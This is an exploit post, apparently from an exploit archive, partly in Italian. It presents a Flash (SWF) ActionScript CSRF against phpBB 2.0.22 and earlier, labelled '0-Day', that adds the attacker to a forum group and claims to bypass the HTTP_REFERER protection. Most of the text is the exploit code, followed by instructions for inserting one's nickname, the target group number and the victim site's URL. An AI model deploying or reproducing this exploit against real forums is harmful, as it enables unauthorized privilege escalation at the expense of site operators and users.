######################################################################################
#                                                                                    #
# Author: Dante90, WaRWolFz Crew                                                     #
# Title: Exploit PhpBB <= 2.0.22 Add User In A Group SWF Version By Dante90 [0-Day]  #
# Proof Of Concept: PhpBB 2.0.22 <= CSRF Add user In Group By Vincy                  #
# Change: ByPass HTTP_REFERER Protection.                                            #
# MSN: dante90.dmc4@hotmail.it                                                       #
# Web: www.warwolfz.org                                                              #
#                                                                                    #
######################################################################################


Exploit PhpBB <= 2.0.22 Add User In A Group By Dante90 [0-Day]

[code]

var username = "[YOUR_NICK]"
var add = "Aggiungi utente"
var g = "[N_GROUP]"
getURL("http://www.victimesite.org/PhpBB2/groupcp.php?g=[N_GROUP]","_self","POST")

[/code]

[YOUR_NICK] = Inserire il vostro Nick

[N_GROUP] = Inserire il Numero del Gruppo in cui volete "Iscrivervi"

Al posto del link www.victimesite.org mettete quello della vittima. 

Dante90

 

 

_________________________________________________________________
Ci sai fare con l'italiano? Gioca su Typectionary!
http://clk.atdmt.com/GBL/go/136430522/direct/01/